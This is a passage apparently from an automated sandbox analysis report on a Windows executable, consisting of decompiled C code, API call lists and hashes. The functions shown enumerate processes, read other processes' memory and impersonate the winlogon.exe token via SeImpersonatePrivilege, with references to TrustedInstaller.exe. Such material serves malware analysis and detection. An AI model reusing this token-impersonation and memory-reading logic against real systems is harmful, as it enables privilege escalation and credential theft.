                                                                                                                                                                                                                          0x004020ef
                                                                                                                                                                                                                          0x00402008
                                                                                                                                                                                                                          0x00402016
                                                                                                                                                                                                                          0x0040201d
                                                                                                                                                                                                                          0x0040202e
                                                                                                                                                                                                                          0x00402035
                                                                                                                                                                                                                          0x00402044
                                                                                                                                                                                                                          0x00402049
                                                                                                                                                                                                                          0x00402055
                                                                                                                                                                                                                          0x00402064
                                                                                                                                                                                                                          0x00402068
                                                                                                                                                                                                                          0x0040206e
                                                                                                                                                                                                                          0x0040208b
                                                                                                                                                                                                                          0x00402070
                                                                                                                                                                                                                          0x00402082
                                                                                                                                                                                                                          0x00402088
                                                                                                                                                                                                                          0x0040209e
                                                                                                                                                                                                                          0x004020a1
                                                                                                                                                                                                                          0x00402119
                                                                                                                                                                                                                          0x00402119
                                                                                                                                                                                                                          0x0040211b
                                                                                                                                                                                                                          0x0040211e
                                                                                                                                                                                                                          0x0040211e
                                                                                                                                                                                                                          0x00402149
                                                                                                                                                                                                                          0x00402151
                                                                                                                                                                                                                          0x00402151
                                                                                                                                                                                                                          0x00402157
                                                                                                                                                                                                                          0x00402157
                                                                                                                                                                                                                          0x004022cb
                                                                                                                                                                                                                          0x004022d2
                                                                                                                                                                                                                          0x004022d2

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040201D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402035
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00402050
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040205F
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004020B4
                                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004020D7
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                                                                                                                          • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                                                                                                                            • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                                                                                                                            • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                                                                                                                            • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                                                                                                                            • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                                                                                                                            • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                                                                                                                            • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                                                                                                                            • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                                                                                                                            • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                                                                                                                            • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                                                                                                                            • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                                                                                                                            • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                                                                                                                            • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00402259
                                                                                                                                                                                                                          • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004022B8
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                                                                                                                          • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                                                                                                                          • API String ID: 3201562063-2355939583
                                                                                                                                                                                                                          • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                                                                          • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}































                                                                                                                                                                                                                          0x00409609
                                                                                                                                                                                                                          0x0040960f
                                                                                                                                                                                                                          0x00409619
                                                                                                                                                                                                                          0x00409623
                                                                                                                                                                                                                          0x0040962e
                                                                                                                                                                                                                          0x00409633
                                                                                                                                                                                                                          0x00409640
                                                                                                                                                                                                                          0x0040964a
                                                                                                                                                                                                                          0x00409782
                                                                                                                                                                                                                          0x0040978c
                                                                                                                                                                                                                          0x00409793
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040965a
                                                                                                                                                                                                                          0x0040965f
                                                                                                                                                                                                                          0x00409678
                                                                                                                                                                                                                          0x0040967e
                                                                                                                                                                                                                          0x00409681
                                                                                                                                                                                                                          0x00409685
                                                                                                                                                                                                                          0x00409688
                                                                                                                                                                                                                          0x004096b2
                                                                                                                                                                                                                          0x004096bf
                                                                                                                                                                                                                          0x004096c6
                                                                                                                                                                                                                          0x004096cb
                                                                                                                                                                                                                          0x004096da
                                                                                                                                                                                                                          0x004096e6
                                                                                                                                                                                                                          0x0040973b
                                                                                                                                                                                                                          0x00409747
                                                                                                                                                                                                                          0x0040975f
                                                                                                                                                                                                                          0x00409764
                                                                                                                                                                                                                          0x0040976a
                                                                                                                                                                                                                          0x00409770
                                                                                                                                                                                                                          0x00409773
                                                                                                                                                                                                                          0x0040977d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040977d
                                                                                                                                                                                                                          0x004096ee
                                                                                                                                                                                                                          0x004096f5
                                                                                                                                                                                                                          0x004096fc
                                                                                                                                                                                                                          0x00409704
                                                                                                                                                                                                                          0x0040970c
                                                                                                                                                                                                                          0x0040971c
                                                                                                                                                                                                                          0x0040971c
                                                                                                                                                                                                                          0x00409704
                                                                                                                                                                                                                          0x00409721
                                                                                                                                                                                                                          0x00409728
                                                                                                                                                                                                                          0x00409739
                                                                                                                                                                                                                          0x00409739
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409728
                                                                                                                                                                                                                          0x00409693
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004096a5
                                                                                                                                                                                                                          0x004096a9
                                                                                                                                                                                                                          0x004096ac
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004096ac
                                                                                                                                                                                                                          0x004097a6

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040962E
                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004096C6
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                                                                                                                                                          • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                                                                                                                                                          • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 239888749-1740548384
                                                                                                                                                                                                                          • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                                                                          • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}








                                                                                                                                                                                                                          0x00409924
                                                                                                                                                                                                                          0x0040992c
                                                                                                                                                                                                                          0x00409937
                                                                                                                                                                                                                          0x0040993f
                                                                                                                                                                                                                          0x0040994a
                                                                                                                                                                                                                          0x00409956
                                                                                                                                                                                                                          0x00409962
                                                                                                                                                                                                                          0x0040996e
                                                                                                                                                                                                                          0x00409971
                                                                                                                                                                                                                          0x00409973
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409976
                                                                                                                                                                                                                          0x00409977

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                          • API String ID: 1529661771-70141382
                                                                                                                                                                                                                          • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                                                                          • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2827331108-0
                                                                                                                                                                                                                          • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                                                                          • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                                                          			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}





























                                                                                                                                                                                                                          0x00401ac9
                                                                                                                                                                                                                          0x00401ad1
                                                                                                                                                                                                                          0x00401ae1
                                                                                                                                                                                                                          0x00401ae7
                                                                                                                                                                                                                          0x00401ae9
                                                                                                                                                                                                                          0x00401aec
                                                                                                                                                                                                                          0x00401c1b
                                                                                                                                                                                                                          0x00401af2
                                                                                                                                                                                                                          0x00401af2
                                                                                                                                                                                                                          0x00401af8
                                                                                                                                                                                                                          0x00401b0c
                                                                                                                                                                                                                          0x00401b12
                                                                                                                                                                                                                          0x00401b1a
                                                                                                                                                                                                                          0x00401bfd
                                                                                                                                                                                                                          0x00401b20
                                                                                                                                                                                                                          0x00401b26
                                                                                                                                                                                                                          0x00401b2b
                                                                                                                                                                                                                          0x00401b36
                                                                                                                                                                                                                          0x00401b40
                                                                                                                                                                                                                          0x00401b43
                                                                                                                                                                                                                          0x00401b4a
                                                                                                                                                                                                                          0x00401b54
                                                                                                                                                                                                                          0x00401b55
                                                                                                                                                                                                                          0x00401b56
                                                                                                                                                                                                                          0x00401b57
                                                                                                                                                                                                                          0x00401b58
                                                                                                                                                                                                                          0x00401b63
                                                                                                                                                                                                                          0x00401b68
                                                                                                                                                                                                                          0x00401b69
                                                                                                                                                                                                                          0x00401b77
                                                                                                                                                                                                                          0x00401b7d
                                                                                                                                                                                                                          0x00401b82
                                                                                                                                                                                                                          0x00401b82
                                                                                                                                                                                                                          0x00401b88
                                                                                                                                                                                                                          0x00401b8b
                                                                                                                                                                                                                          0x00401b8e
                                                                                                                                                                                                                          0x00401b91
                                                                                                                                                                                                                          0x00401b98
                                                                                                                                                                                                                          0x00401b9b
                                                                                                                                                                                                                          0x00401ba0
                                                                                                                                                                                                                          0x00401ba5
                                                                                                                                                                                                                          0x00401baa
                                                                                                                                                                                                                          0x00401bac
                                                                                                                                                                                                                          0x00401bac
                                                                                                                                                                                                                          0x00401bb2
                                                                                                                                                                                                                          0x00401bb2
                                                                                                                                                                                                                          0x00401bbe
                                                                                                                                                                                                                          0x00401bc4
                                                                                                                                                                                                                          0x00401bc6
                                                                                                                                                                                                                          0x00401bc8
                                                                                                                                                                                                                          0x00401bc8
                                                                                                                                                                                                                          0x00401bd7
                                                                                                                                                                                                                          0x00401be6
                                                                                                                                                                                                                          0x00401bee
                                                                                                                                                                                                                          0x00401bf0
                                                                                                                                                                                                                          0x00401bf0
                                                                                                                                                                                                                          0x00401c02
                                                                                                                                                                                                                          0x00401c0e
                                                                                                                                                                                                                          0x00401c0e
                                                                                                                                                                                                                          0x00401c23

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401B4A
                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                                                                                                                            • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                            • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %d %I64x
                                                                                                                                                                                                                          • API String ID: 1126726007-2565891505
                                                                                                                                                                                                                          • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                                                                                                                          • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                                                                                                                          0x00401f04
                                                                                                                                                                                                                          0x00401f20
                                                                                                                                                                                                                          0x00401f27
                                                                                                                                                                                                                          0x00401f38
                                                                                                                                                                                                                          0x00401f3f
                                                                                                                                                                                                                          0x00401f4e
                                                                                                                                                                                                                          0x00401f54
                                                                                                                                                                                                                          0x00401f5f
                                                                                                                                                                                                                          0x00401f6e
                                                                                                                                                                                                                          0x00401f72
